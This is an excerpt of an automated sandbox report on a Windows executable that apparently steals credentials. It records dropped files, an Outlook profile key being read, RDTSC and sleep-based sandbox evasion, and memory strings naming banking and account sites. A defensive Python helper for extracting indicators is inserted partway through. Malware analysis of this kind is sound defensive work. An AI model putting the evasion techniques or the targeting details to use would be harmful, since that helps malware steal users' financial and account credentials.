            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udtrttede.ini
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: GBYfjUz4a5.exe | Static file information: File size 1076355 > 1048576

            Data Obfuscation

            Source: Yara match | File source: Process Memory Space: GBYfjUz4a5.exe PID: 6292, type: MEMORYSTR
            Source: Yara match | File source: 00000000.00000002.1545029670.0000000005E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406252
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_10002DB0 push eax; ret 0_2_10002DDE
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BD9C30 push esp; retf 02C4h 7_2_02BD9D55
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02E30007 push edi; iretd 7_2_02E30016
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Local\Temp\nst7D0.tmp\System.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Periwinkles.Twe
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Litiscontest.jpg
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\bakteriologiske.Brn
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Tiggerstavens.fes
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udgyd.ini
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udtrttede.ini
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\aktioners.jpg
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\begrdeliges.pro
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\burdie.ini
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\cartographer.jpg
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\histographies.txt
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\icekhana.txt
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\manxman.jpg
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\modstaaet.jpg
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\musicianer.spi
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\ndder.jpg
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\romantiserendes.ini
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\semiquadrangle.ini
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\sugarcane.jpg
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\tinkle.jpg
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\unagitatedness.txt
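The dropped-file entries above are the most reusable artifacts in this section, but as extracted they are sandbox-specific (hard-coded `C:\Users\user`) and glued together with link text. The helper below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses lines in the report's own layout, rewrites the profile path to `%USERPROFILE%`, groups the drops into staging directories, and tags the `%TEMP%\ns*.tmp\System.dll` drop as what it is, an NSIS plugin (NSIS unpacks its plugins into a `ns<random>.tmp` directory under `%TEMP%` and loads them with LoadLibrary, which is why a later entry in this report can list it as "dropped but not started"). The sample lines are a constructed excerpt of the entries above; the classification labels are this example's own.

```python
"""Triage helper for the dropped-file entries above.

Added example: not part of the Joe Sandbox report and not code from the sample.
Input lines look like 'Source: <process>File created: <path>Jump to behavior'
because the extraction glued the table cells together.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample input: six lines copied in the report's own layout.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Local\Temp\nst7D0.tmp\System.dllJump to dropped file",
    r"Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerneJump to behavior",
    r"Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udgyd.iniJump to behavior",
    r"Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udtrttede.iniJump to behavior",
    r"Source: C:\Users\user\Desktop\GBYfjUz4a5.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Resorberede\tinkle.jpgJump to behavior",
    r"Source: C:\Users\user\Desktop\GBYfjUz4a5.exeSection loaded: dpapi.dllJump to behavior",
]

# Anchor on the '.exe' that ends the process column; the trailing link text is optional.
FILE_EVENT_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)(?P<event>File created|File written):\s*"
    r"(?P<path>.+?)(?:Jump to behavior|Jump to dropped file)?$"
)
# NSIS unpacks its plugins into %TEMP%\ns<random>.tmp\ and loads them with LoadLibrary.
NSIS_PLUGIN_DIR_RE = re.compile(r"\\Temp\\ns[0-9A-Za-z]+\.tmp$", re.IGNORECASE)


def parse_file_events(lines):
    """Return (event, path) tuples for every file-creation or file-write entry."""
    events = []
    for line in lines:
        m = FILE_EVENT_RE.match(line.strip())
        if m:
            events.append((m.group("event"), m.group("path")))
    return events


def generalize(path):
    """Swap the sandbox profile (C:\\Users\\user) for %USERPROFILE% so the IOC fits any host."""
    return re.sub(r"^[A-Za-z]:\\Users\\[^\\]+", "%USERPROFILE%", path)


def staging_dirs(events):
    """Group dropped names by their generalized parent directory."""
    by_dir = defaultdict(set)
    for _, path in events:
        p = PureWindowsPath(path)
        by_dir[generalize(str(p.parent))].add(p.name)
    return dict(by_dir)


def classify(path):
    """Say what a dropped path most likely is, from its location alone (labels are this example's)."""
    p = PureWindowsPath(path)
    if NSIS_PLUGIN_DIR_RE.search(str(p.parent)) and p.suffix.lower() == ".dll":
        # An NSIS plugin runs inside the installer process via LoadLibrary, so it never
        # shows up as a started process even though its code executes.
        return "nsis-plugin"
    if "\\Start Menu\\" in path:
        return "start-menu-staging"
    return "other"


def hunting_globs(events):
    """One glob per staging directory, ready for a file-path hunt on other hosts."""
    return sorted(d + "\\*" for d in staging_dirs(events))


if __name__ == "__main__":
    evs = parse_file_events(REPORT_LINES)
    for event, path in evs:
        print(f"{event:12} {classify(path):20} {generalize(path)}")
    print("\n".join(hunting_globs(evs)))
```

Run it against the full list of "File created" entries rather than the excerpt to get every staging directory; the Start Menu folder with a nested sub-folder and a mix of .ini/.jpg/.txt names is the pattern worth hunting for, while the `System.dll` drop is installer plumbing and not an independent payload.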
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Process information set: NOOPENFILEERRORBOX (identical entry repeated 60 times in the report)

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | API/Special instruction interceptor: Address: 62C201A
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | API/Special instruction interceptor: Address: 262201A
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | RDTSC instruction interceptor: First address: 62585D8 second address: 62585D8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F2394BB9B69h 0x00000006 test ax, dx 0x00000009 jmp 00007F2394BB9BC8h 0x0000000b inc ebp 0x0000000c test edi, 1E8ED3CBh 0x00000012 inc ebx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | RDTSC instruction interceptor: First address: 25B85D8 second address: 25B85D8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F239539C839h 0x00000006 test ax, dx 0x00000009 jmp 00007F239539C898h 0x0000000b inc ebp 0x0000000c test edi, 1E8ED3CBh 0x00000012 inc ebx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Memory allocated: 2BD0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Memory allocated: 33360000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Memory allocated: 35360000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BD3E09 rdtsc 7_2_02BD3E09
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 599875
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 599766
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 599656
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 599547
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 599438
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 599328
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 599219
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 599109
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 599000
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 598891
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 598781
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 598672
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 598563
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 598438
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 598313
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 598188
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 598078
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 597969
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 597844
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 597735
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 597610
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 597485
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 597360
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 597235
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 597110
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 596985
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 596860
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 596735
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 596610
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 596485
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 596360
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 596235
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 596110
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 595985
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 595859
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 595750
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 595640
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 595531
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 595422
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 595313
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 595188
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 595078
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 594968
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 594855
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 594750
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 594640
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 594523
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 594422
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 594313
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Window / User API: threadDelayed 8377
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Window / User API: threadDelayed 1454
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst7D0.tmp\System.dll
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | API coverage: 1.7 %
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep count: 31 > 30
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -28592453314249787s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -599875s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7556 | Thread sleep count: 8377 > 30
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7556 | Thread sleep count: 1454 > 30
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -599766s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -599656s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -599547s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -599438s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -599328s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -599219s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -599109s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -599000s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -598891s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -598781s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -598672s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -598563s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -598438s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -598313s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -598188s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -598078s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -597969s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -597844s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -597735s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -597610s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -597485s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -597360s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -597235s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -597110s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -596985s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -596860s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -596735s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -596610s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -596485s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -596360s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -596235s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -596110s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -595985s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -595859s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -595750s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -595640s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -595531s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -595422s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -595313s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -595188s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -595078s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -594968s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -594855s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -594750s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -594640s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -594523s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -594422s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe TID: 7552 | Thread sleep time: -594313s >= -30000s
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_0040276E FindFirstFileW, 0_2_0040276E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405770
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_0040622B FindFirstFileW,FindClose, 0_2_0040622B
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_0040276E FindFirstFileW, 7_2_0040276E
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_00405770
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_0040622B FindFirstFileW,FindClose, 7_2_0040622B
            Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Thread delayed: delay time: 922337203685477, then 600000 stepping down to 594313 (the same 51 delay values already listed in this section, repeated verbatim in the report)
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F38000.00000004.00000020.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F90000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
